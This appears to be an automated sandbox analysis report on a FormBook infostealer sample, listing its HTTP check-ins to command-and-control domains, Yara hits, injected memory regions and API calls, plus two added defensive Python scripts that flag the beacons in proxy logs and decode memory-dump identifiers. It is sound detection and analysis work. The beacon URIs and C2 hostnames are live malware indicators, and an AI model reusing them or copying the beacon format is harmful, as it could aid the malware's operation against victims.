          Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7sZO9vcU+qRF0rgQ==&s6=z484 HTTP/1.1; Host: www.seal-brother.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty, the seven raw bytes are NUL)
          Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=whGcnAY+p5z1rRe/fmSdvfSEJoFYodGcl+5aIh9wENe/LQ+yrONZ1XbZa9wseLnSfrq3uQOSsg==&s6=z484 HTTP/1.1; Host: www.athafood.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty, the seven raw bytes are NUL)
          Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=LbdaYrSuq7QDvfsS7oVDq2uzukwE8JpfT8hIBAsO2A/TzW5xSQi4YlBQHFWhJAqsjukGZieEfA==&s6=z484 HTTP/1.1; Host: www.farmersfirstseed.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty, the seven raw bytes are NUL)
          Source: ClgNlmU3Is.exe, 00000000.00000002.262438937.0000000000C99000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
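The seven GET requests above share one path (/fqiq/), the same two query keys (Hb08, s6), a long unencoded base64 value in the first key (76 characters in the ones reused below), a short fixed trailer in the second, Connection: close, and no User-Agent header. The detection below is an added example and not part of the report; it runs over constructed, tab-separated proxy-log lines that reuse three of the requests above plus two benign look-alikes, and flags a request only when the same beacon shape reaches several distinct hosts. The log format, column layout, thresholds and the minimum-host count are assumptions chosen for the example.

```python
"""Flag HTTP requests shaped like the FormBook check-ins listed above: the same
URI path and query-key layout sent to many unrelated hosts, an unencoded
base64 blob in the first parameter, a short fixed trailer in the second,
Connection: close and no User-Agent header."""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Unencoded base64 alphabet. The beacons carry '+', '/' and '=' literally,
# which is itself a tell: browsers and HTTP libraries percent-encode them.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed log lines in a tab-separated proxy-log style (not from the report).
# Columns: host, method, uri, User-Agent ('-' when absent), Connection header.
# The first three reuse hosts and query strings observed above; the last two
# are benign look-alikes added to show what does not get flagged.
SAMPLE_LOG = (
    "www.tablescaperendezvous4two.com\tGET\t/fqiq/?Hb08=6JOAu55Y8Xzp5was3x3zF3lJbu5eEm2HTNz3vpdd7KIK0WEVLfillQ9z+rMr7mc/lcAimk0NkA==&s6=z484\t-\tclose\n"
    "www.doggycc.com\tGET\t/fqiq/?Hb08=tdw/kGifcRQg4xawfHQmMwAAiMBNQnR2khC/NrDNjqaKgTZ0vjz3oBz05sNQvFL8j7TnHhbqsg==&s6=z484\t-\tclose\n"
    "www.hartfulcleaning.com\tGET\t/fqiq/?Hb08=uHvuYmjgw/ClkyRj1Ej7vtyQWzU3HFRSMqPjxcCXctDPT+ZSz8NKmBzsVhzcWgEZit3oXGWMXw==&s6=z484\t-\tclose\n"
    "www.example.org\tGET\t/fqiq/?Hb08=short&s6=z484\tMozilla/5.0\tkeep-alive\n"
    "www.example.com\tGET\t/index.html?utm_source=newsletter&id=42\tMozilla/5.0\tkeep-alive\n"
)


@dataclass(frozen=True)
class Request:
    host: str
    method: str
    uri: str
    user_agent: str
    connection: str


def parse_log(text: str) -> list:
    """Split tab-separated lines into Request records."""
    reqs = []
    for line in text.splitlines():
        if line.strip():
            host, method, uri, ua, conn = line.split("\t")
            reqs.append(Request(host, method, uri, ua, conn))
    return reqs


def split_query(uri: str) -> list:
    """Return (key, value) pairs without decoding. urllib.parse.parse_qsl would
    turn the literal '+' inside the blob into a space and break the base64 check."""
    query = urlsplit(uri).query
    return [tuple(p.partition("=")[::2]) for p in query.split("&") if p]


def request_reasons(req: Request, min_blob: int = 40, max_trailer: int = 6) -> list:
    """Per-request indicators that do not depend on which other hosts were contacted."""
    reasons = []
    params = split_query(req.uri)
    if req.user_agent == "-":
        reasons.append("no User-Agent")
    if req.connection.lower() == "close":
        reasons.append("Connection: close")
    if (len(params) == 2
            and len(params[0][1]) >= min_blob and BASE64_RE.match(params[0][1])
            and len(params[1][1]) <= max_trailer):
        reasons.append("unencoded base64 blob + short trailer")
    return reasons


def flag_beacons(reqs: list, min_hosts: int = 3) -> list:
    """Group requests by (path, query keys). Within a group whose fully
    indicated members span at least min_hosts distinct hosts, return each such
    member as (host, uri, reasons). Requiring several hosts models the report's
    observation of one beacon shape sent to many unrelated domains."""
    groups = defaultdict(list)
    for r in reqs:
        keys = tuple(k for k, _ in split_query(r.uri))
        groups[(urlsplit(r.uri).path, keys)].append(r)
    hits = []
    for members in groups.values():
        strong = [(m, request_reasons(m)) for m in members]
        strong = [(m, why) for m, why in strong if len(why) == 3]
        if len({m.host for m, _ in strong}) >= min_hosts:
            hits.extend((m.host, m.uri, why) for m, why in strong)
    return hits


if __name__ == "__main__":
    for host, uri, why in flag_beacons(parse_log(SAMPLE_LOG)):
        print(f"{host} {uri[:40]}... <- {', '.join(why)}")
```

The per-request indicators alone are weak on their own (plenty of legitimate clients omit a User-Agent or send Connection: close); the grouping across hosts is what turns them into a usable alert, and the benign /fqiq/ line to www.example.org shows that sharing the path is not enough by itself.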

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: ClgNlmU3Is.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
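The memory-region identifiers that the Yara hits above (under "Yara detected FormBook" and again under the community-rule and full-metadata lists) are reported against encode which process and region each match lives in, and that is the part an analyst wants decoded: the payload sits in writable-and-executable memory at 0x400000 in process 5, a second instance of the sample, which fits the hollowing signatures, and in control.exe, while process 0, the .NET loader, only holds a read-write copy on its heap. The decoder below is an added example, not part of the report or of Joe Sandbox's tooling. It assumes the name layout pid.phase.ordinal.base.protect.type.sdmp with hex fields (my reading of the names; the hex pid is corroborated by 00000012 matching the 18_2_ control.exe functions listed below, and the protection values are the winnt.h constants). The phase field is carried through as a number without interpretation.

```python
"""Decode the memory-dump identifiers the Yara hits above are reported against
and list the regions whose page protection is both writable and executable."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Page-protection constants from winnt.h (low byte of the field).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
# Memory types from winnt.h. Values outside this table (the report also uses
# 0x1) are left raw rather than guessed at.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: pid.phase.ordinal.base.protect.type.sdmp, every field hex
# except the ordinal. The pid really is hex: 00000012 is the control.exe
# process whose functions the report labels 18_2_..., not process 12.
DUMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Region:
    pid: int
    phase: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def rwx(self) -> bool:
        """Writable and executable at once: data landed here and is being run."""
        p = self.protect & 0xFF
        return p in WRITABLE and p in EXECUTABLE


def parse_dump_name(name: str) -> Region:
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a dump identifier: {name!r}")
    pid, phase, _ordinal, base, protect, mtype = m.groups()
    return Region(int(pid, 16), int(phase, 16), int(base, 16),
                  int(protect, 16), int(mtype, 16))


# The nine identifiers from the "Yara detected FormBook" list above.
HITS = [
    "00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp",
    "00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp",
    "00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp",
    "00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp",
    "00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp",
    "00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp",
    "00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp",
    "00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp",
    "00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp",
]


def rwx_regions(names) -> list:
    """Deduplicated, sorted (pid, base) pairs with writable+executable protection."""
    return sorted({(r.pid, r.base) for r in map(parse_dump_name, names) if r.rwx})


def by_process(names) -> dict:
    """pid -> sorted list of (base, protection name, memory type) for triage."""
    out = defaultdict(set)
    for r in map(parse_dump_name, names):
        out[r.pid].add((r.base, r.protect_name, r.type_name))
    return {pid: sorted(v) for pid, v in out.items()}


if __name__ == "__main__":
    for pid, regions in sorted(by_process(HITS).items()):
        for base, prot, mtype in regions:
            print(f"pid {pid:>2} {base:#010x} {prot:<24} {mtype}")
```

Reading the output next to the signatures in the overview: an RWX region at the default 32-bit image base 0x400000 in a second copy of the sample is what "Sample uses process hollowing technique" looks like in memory, and the RWX private regions in pid 18 are the injected copy that the control.exe function list further down is taken from.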
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 0_2_00C8D064
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 0_2_00C8F298
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 0_2_00C8F297
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 0_2_052570A0
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_0040102D
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_0041B8D3
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_0041B8D6
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_0041C98B
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_0041C343
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_00408C8B
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_00408C90
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_00402FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046C841F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_04771002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046CB090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_04781D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046B0D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046D4120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046BF900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046CD5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046D6E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046EEBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E2C343
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E2B8D3
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E2B8D6
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E2C98B
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E12FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E18C8B
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E18C90
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E12D8C
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_02E12D90
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 046BB150 appears 32 times
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_004185F0 NtCreateFile
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_004186A0 NtReadFile
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_00418720 NtClose
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_004187D0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_004185EB NtCreateFile
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_0041871A NtClose
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 5_2_004187CA NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F95D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F96D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9FE0 NtCreateMutant, LdrInitializeThunk
